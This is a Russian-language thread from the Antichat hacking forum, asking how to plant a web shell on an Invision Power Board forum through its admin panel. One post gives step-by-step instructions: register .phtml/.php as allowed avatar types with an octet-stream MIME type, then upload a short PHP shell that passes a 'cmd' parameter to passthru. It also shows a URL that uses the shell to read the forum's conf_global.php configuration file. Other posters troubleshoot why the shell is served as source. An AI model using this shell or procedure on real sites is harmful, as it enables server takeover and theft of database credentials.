ANTICHAT - Cпособы залить шел в Invision через админку?

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Cпособы залить шел в Invision через админку? (https://forum.antichat.xyz/showthread.php?t=20161)

Та же проблема.

Подобная проблема и у меня, Зливка смайлов запрещена, вообще запрещена.

Сделал расширение php разрешенным для Заливки и для использования в качестве аватара.
Через Mysql тоже не катит ! Аутфайл запрещен.

Что можно сделатЬ, шел залить очень нужно.

пароль От Админки ни чему не подходит...

Нашел вот тему по этому поводу, Кстати на Античате.

Короче так.
Надо лишь поискать по форуму Античата =)

http://forum.antichat.ru/thread11551.html

Написать шелл...
Переименовать в cmd.phtml
На ломаемом форуме расзрешить загрузку файлов с расширением .phtml + разрешить использовать их как Аватары... + добавить строку application/octet-stream
в тип файла.
Проще даже отредактировать существующий тип.

Код:

Например:



.gif  

image/gif

Использовать ак аватар +



Делаем:



.php

application/octet-stream

Использовать ак аватар +

Загрузить как аватар любому пользователю файл с вашим шеллом
cmd.phtml
Содержания примерно:

Код:

<?

echo "<pre>";

passthru("$cmd");

echo "</pre>";

?>

и использовать:
__http://ww.site.ru/forums/uploads/avatar.phtml?cmd=cat ../conf_global.php

проблема с залитым шелом... залил по выше описаному способу шел всё вроде норм но при запуске шела он не запускается, а начинает грузится мне на комп :( расширение файла phtml...

просто не сообщил серверу что это пхп скрипт.
поиск рулит.

ээ а как сообщить? :)

Цитата:

Сообщение от cc.melfox

ээ а как сообщить? :)

Вот именно как?
Шелл заливается, но не работает, а выдает только исходник.